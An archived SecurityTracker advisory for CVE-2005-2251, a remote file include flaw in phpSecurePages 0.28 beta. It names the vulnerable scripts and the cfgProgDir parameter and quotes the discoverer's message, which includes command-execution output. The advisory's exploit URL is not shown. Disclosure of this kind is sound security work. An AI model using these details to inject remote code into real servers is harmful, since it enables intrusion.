Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Security)  >   phpSecurePages Vendors:   Kruyt, Paul
phpSecurePages Include File Bug in 'secure.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014410
SecurityTracker URL:
CVE Reference:   CVE-2005-2251   (Links to External Site)
Updated:  Jun 16 2008
Original Entry Date:  Jul 7 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.28 beta
Description:   Status-x reported an include file vulnerability in phpSecurePages. A remote user can execute arbitrary commands on the target system.

The 'secure.php' script does not properly validate user-supplied input in the 'cfgProgDir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:


[Editor's note: frog-m@n reported a vulnerability in the 'checklogin.php' script in October 2002, affecting version 0.27b. Status-x reports that the latest version (0.28 beta) is also vulnerable. See Alert ID 1005370.]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  phpSecurePages Remote File Include

Affected software: phpSecurePages X.X

Risk: High

Vendor Contacted at but didnt replied

phpSecurePages its a secure protection for restricted directories and
it wont let anybody introduce in your site! <---- lie


We got a bad filtering in the secure.php and checklogin.php code in
the phpSecurePages Directory

Successful exploting requires that secure.php or checklogin.php are
loaded correctly by the system



uid=3D32169(ooddles) gid=3D32170(ooddles)

So be careful to use this ;)


Not original Advisory Available

by Status-x  -

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC